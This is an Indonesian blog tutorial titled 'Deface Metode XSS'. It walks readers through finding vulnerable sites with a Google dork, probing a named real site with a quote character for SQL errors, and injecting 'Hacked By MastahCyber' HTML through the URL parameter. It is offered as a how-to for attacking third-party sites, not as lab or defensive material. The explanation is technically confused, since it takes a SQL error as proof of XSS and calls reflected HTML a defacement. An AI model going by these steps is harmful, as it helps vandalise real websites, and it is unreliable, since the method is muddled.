Deface Metode XSS

Jumat, 15 Juni 2018

Home ›Deface ›Deface Metode XSS

Deface Metode XSS

Juni 15, 2018

Deface Metode XSS atau disebut juga Cross Site Scripting Attack adalah metode dimana client memasukan script HTML kedalam sebuah website.

Berikut tutorial Deface Metode XSS :

1.) Dorking, Dork :

inurl:news.php?id= ( kembangkan )

2.) Pilih lah salah satu situs atau website.

Contohnya saya menggunakan situs :

http://www.jmtv.com/news.php?id=3

3.) Cobalah masukan ' dibelakang url contohnya :

http://www.jmtv.com/news.php?id=3'

Jika blank ataupun muncul sql bla bla berarti vuln contohnya situs yang saya gunakan ini muncul :

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

4.) Selanjutnya coba masukan script HTML dibelakang url contohnya :

http://www.jmtv.com/news.php?id=3%27<h1>Hacked By MastahCyber</h1>

Tips! : Kalian juga bisa mengubahnya dengan script HTML lainnya.

Nah setelah seperti itu akan muncul seperti gambar dibawah ini berarti kita berhasil mendeface situs tersebut dengan metode xss ini.

Gunakanlah dengan bijak jangan sampai merugikan orang lain.

Sekian tutorial tentang Deface Metode XSS sampai jumpa di tutorial menarik lainnya.

Add Your Comments

bold <b>b</b>

italic <i>i</i>

underline <u>u</u>

HTML<code></code> use Parser

Emoticon

Parser

😊

😉

😀

😁

😎

😍

😜

😑

😇

💖

😯

😱

😭

👍

❓

🍻